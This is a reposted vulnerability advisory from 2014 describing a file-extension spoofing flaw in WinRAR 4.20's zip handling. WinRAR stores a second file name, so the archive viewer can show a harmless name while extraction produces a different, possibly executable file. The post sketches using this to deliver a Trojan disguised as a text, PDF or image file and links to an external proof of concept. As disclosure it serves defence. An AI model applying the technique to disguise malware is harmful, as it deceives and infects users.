WinRar 4.20 - File Extension Spoofing (0Day)

27 篇文章 0 订阅
14 篇文章 0 订阅
# Exploit Title: WinRar File extension spoofing (0Day)

# Date: 23/03/14
# Exploit Author: Danor Cohen (An7i)  (http://an7isec.blogspot.co.il/) (https://twitter.com/An7i21)
# Vendor Homepage: http://www.rarlab.com/
# Version: [4.20]
# Tested on: [Windows 8 ,Windows 7 ,Windows xp]
-------------------------------------------------------------------------------------------------

WinRar File extension spoofing ( 0DAY )

Winrar is one of the most common application for compressing and decompressing data.

The application is capble of compressing data as rar or as zip format.

This Article is going to present a new Vulnerability that i found at WINRAR version 4.20
(other version maybe vulnerable to).

Here is a quick brief of the zip file format:



Offset

Bytes

Description[25]

00 4 Local file header signature = 0x04034b50 (read as a little-endian number)
04 2 Version needed to extract (minimum)
06 2 General purpose bit flag
08 2 Compression method
10 2 File last modification time
12 2 File last modification date
14 4 CRC-32
18 4 Compressed size
22 4 Uncompressed size
26 2 File name length (n)
28 2 Extra field length (m)
30 n File name
30+n m Extra field

(the information taken from wiki - http://en.wikipedia.org/wiki/Zip_(file_format) )

---------------------------------------------------------------------------------------------------


So by the file format descriptor, we can see that the Bits at offset 30 are referred to

the file name of the compressed file.

When we try to compress the file as "ZIP Format" with WINRAR, the file structure looks

the same, but! WINRAR adds several properties of its own.

WINRAR add extra "file name" into the compressed file like extra "filename".


Further analysis reveals that the second name is the "File Name" of the file, that WINRAR will give to

the output uncompressed file, while the First name is the name that appears at the WINRAR GUI window.



This Behavior can easily turned into a very dangerous security hole.

Think about a hacker that publish some informative "txt" file called "ReadMe.txt" or even

PDF like "VirusTotal_ScanResults.pdf" or more tempting file like"My Girl Friend new bathing suit.jpg".


Think about an innocent user that will open that file and instead of getting readme file, PDF book

or interesting image, he will get a nasty Trojan Horse...


POC can be found at the original post at my blogpost:

http://an7isec.blogspot.co.il/2014/03/winrar-file-extension-spoofing-0day.html
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值